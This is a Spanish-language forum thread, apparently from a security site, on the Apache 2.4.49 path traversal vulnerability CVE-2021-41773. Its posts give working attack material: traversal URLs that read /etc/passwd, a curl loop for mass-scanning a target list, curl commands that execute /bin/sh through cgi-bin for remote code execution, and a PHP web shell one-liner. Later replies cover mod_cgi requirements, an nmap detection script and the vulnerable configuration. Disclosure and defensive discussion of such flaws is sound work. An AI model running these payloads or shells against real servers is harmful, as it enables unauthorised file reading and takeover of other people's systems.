Título: Grave Vulnerabilidad en servidor web Apache 2.4.49 CVE-2021-41773 Publicado por: el-brujo en 6 Octubre 2021, 12:07 pm CVE-2021-41773 POC
La vulnerabilidad sólo funciona con Apache HTTP 2.4.49 Y según Shodan: hay 112,755 Apache Server 2.4.49 Citar 127.0.0.1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd Citar cat targets.txt | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done Citar curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname' uid=1(daemon) gid=1(daemon) groups=1(daemon) Linux Código: <?php echo system($_GET['c']); ?> Local file disclosure Citar $ curl -s --path-as-is "http://localhost:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" Remote Code Execution Citar $ curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' "http://localhost:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh" Bug https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 Título: Re: Grave Vulnerabilidad en servidor web Apache 2.4.49 CVE-2021-41773 Publicado por: WHK en 6 Octubre 2021, 19:12 pm Código: root@x:~# curl --silent --path-as-is --insecure "127.0.0.1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" Creo que no es replicable en ciertas circunstancias, talves deba tener habilitado cgi para eso. Título: Re: Grave Vulnerabilidad en servidor web Apache 2.4.49 CVE-2021-41773 Publicado por: MCKSys Argentina en 6 Octubre 2021, 19:36 pm Si, necesita CGI enabled: https://github.com/blasty/CVE-2021-41773 (https://github.com/blasty/CVE-2021-41773)
EDIT: RCE: https://twitter.com/wdormann/status/1445676921581228038 (https://twitter.com/wdormann/status/1445676921581228038) Saludos! Título: Re: Grave Vulnerabilidad en servidor web Apache 2.4.49 CVE-2021-41773 Publicado por: el-brujo en 7 Octubre 2021, 17:14 pm WHK, la vulnerabilidad sólo funciona con Apache HTTP 2.4.49, ninguna otra versión anterior.
módulo habilitado mod_cgi --> permite además RCE MCKSys Argentina y funciona también para Windows como comenta Will Dormann en twitter https://twitter.com/wdormann/status/1445573881121546245 Título: Re: Grave Vulnerabilidad en servidor web Apache 2.4.49 CVE-2021-41773 Publicado por: WHK en 7 Octubre 2021, 18:59 pm Relacionado: https://twitter.com/wdormann/status/1445676921581228038
Título: Re: Grave Vulnerabilidad en servidor web Apache 2.4.49 CVE-2021-41773 Publicado por: el-brujo en 13 Octubre 2021, 11:22 am Script NSE para escáner nmap de la vulnerabilidad servidor web Apache 2.4.49
- CVE-2021-41773 https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse Apache 2.4.49 (CVE-2021-41773) y 2.4.50 (CVE-2021-42013) (https://pbs.twimg.com/media/FBM6yfQXoAcVtoX?format=jpg&name=small) - vulnerable: Código: <Directory /> - NOT vulnerable (** DEFAULT **) Código: <Directory /> |